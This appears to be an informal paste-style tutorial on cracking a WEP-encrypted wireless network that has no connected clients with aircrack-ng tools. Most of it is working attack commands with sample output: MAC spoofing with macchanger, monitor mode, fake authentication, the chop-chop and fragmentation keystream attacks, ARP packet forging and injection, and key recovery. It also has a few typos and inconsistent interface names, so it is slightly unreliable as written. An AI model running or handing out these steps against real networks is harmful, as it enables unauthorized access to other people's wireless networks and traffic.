wep no client

1. cracking wep encrypted network with clientless:
2.  
3. -----------------------------------------------
4.  
5. (1)spoof wireless card mac address
6. (2)put wireless card into monitor mode
7. (3)scan for the target AP using airodump-ng
8. (4)fake authentication using aireplay-ng option -1
9. (5)use korek chop chop attack, fragmentation attack or
10. the old pre ptw method(aireplay -2 -p0841 option).
11. (6)deauthenticate a non connected client from the AP(to speed up injecting, dunno but usually works)
12. (7)find the wep key using aircrack-ng
13. ------------------------------------------------
14. (1)spoof our wireless card mac address:
15. ifcoonfig ath0 down
16. ifconfig wifi0 down
17. macchanger --mac 00:11:22:33:44:55 wifi0
18.  
19. my output is:
20. Current MAC: <my mac> (unknown)
21. Faked MAC:   00:11:22:33:44:55 (Cimsys Inc)
22.  
23. (2)put wireless card into monitor mode:
24. ifconfig wifi0 up
25. ifconfig ath0 down
26. airmon-ng start wifi0
27.  
28. my output is:
29. ...
30. Interface   Chipset     Driver
31.  
32. wifi0       Atheros     madwifi-ng
33. ath0        Atheros     madwifi-ng VAP (parent: wifi0)
34. ath1        Atheros     madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
35.  
36. (3)scan for the target AP using airodump-ng:
37.  
38. airodump-ng ath1
39.  
40.  
41. hit ctrl+c to quit, then observe the channel n copy n paste the bssid (mac address AP):
42.  
43. airodump-ng -c <channel>  -w <output>  --bssid <APmac> rausb0
44.  
45.  
46.  
47. (here we focus on specific Ap such dat we filter out any othr possibilty of intrference from othr Aps on d same chnnl,
48. hence, reduce the chance of a failed auth/association or a failed attack)
49.  
50. othr commands dat can be used:
51.  
52. airodump-ng -w <output> --ivs -c <channel> ath1
53.  
54.  
55.  
56. (4)fake authentication using aireplay-ng option -1:
57.  
58. aireplay-ng -1 0 -e <APname>  -a <APmac> -h <yourmac> ath1
59.  
60. other command can be used:
61. aireplay-ng -1 6000 -o 1 -q 10 -e <APname> -a <APmac> -h <yourmac> rausb0
62.  
63.  
64.  
65. (5)use korek chop chop attack, fragmentation attack or
66. the old pre ptw method(aireplay -2 -p0841 option):
67.  
68. #korek chop-chop attack(-4 option):
69.  
70. ----------------------------------
71. 1-make a XOR packet using chop chop attack -4 option to use with packetfrg:
72. aireplay-ng -4 -b <APmac> -h <yourmac> ath1
73.  
74.  
75.  
76. wait n answer yes  ..
77.  
78. output is:
79. Saving plaintext in replay_whatever.cap...
80.  
81. Saving keystream in replay_whatever.xor
82.  
83.  
84. 2-create an arp packet using packetforge-ng:
85.  
86. packetforge-ng -0 -a <mac> -h <yourmac> -k 255.255.255.255 -l 255.255.255.255.255 -y replay_whatever.xor -w arp-request  
87.  
88.  
89. output is:
90.  
91. wrote packet to: arp-request
92.  
93.  
94.  
95. 3-inject the arp packet:
96. aireplay-ng -2 -r arp-request ath1
97.  
98.  
99.  
100. say yes... n wait..
101.  
102. 4.find the wep key using aircrack-ng:
103.  
104. aircrack-ng <output>*.cap
105.  
106. #fragmentation attack (-5 option):
107. ---------------------------------
108. 1-make a XOR packet from frag attck -5 option(generate valid keystream)to use with packetfrg:
109.  
110. aireplay-ng -5 -b <ApMac> -h <yrMac> ath1
111.  
112.  
113.  
114. answer yes..
115. output is:
116.  
117. Saving keystream in replay_whatever.xor
118.  
119.  
120. 2-create an arp packet using packetforge-ng:
121.  
122. packetforge-ng -0 -a ApMac  -h yrMac -k 255.255.255.255 -l 255.255.255.255.255 -y replay_whatever.xor -w arp-request
123.  
124.  
125. 3-inject the arp packet:
126.  
127. aireplay-ng -2 -r arp-request ath1
128.  
129.  
130. answer yes... n wait
131.  
132.  
133. 4.find the wep key using aircrack-ng:
134.  
135. aircrack-ng <output>*.cap
136.  
137.  
138. #the old pre ptw method(aireplay -2 -p0841 option):
139. --------------------------------------------------
140. 1.aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <ApMac> -h <yrMac> ath1
141.  
142.  
143. 2.find the wep key using aircrack-ng:
144.  
145. aircrack-ng <output>*.cap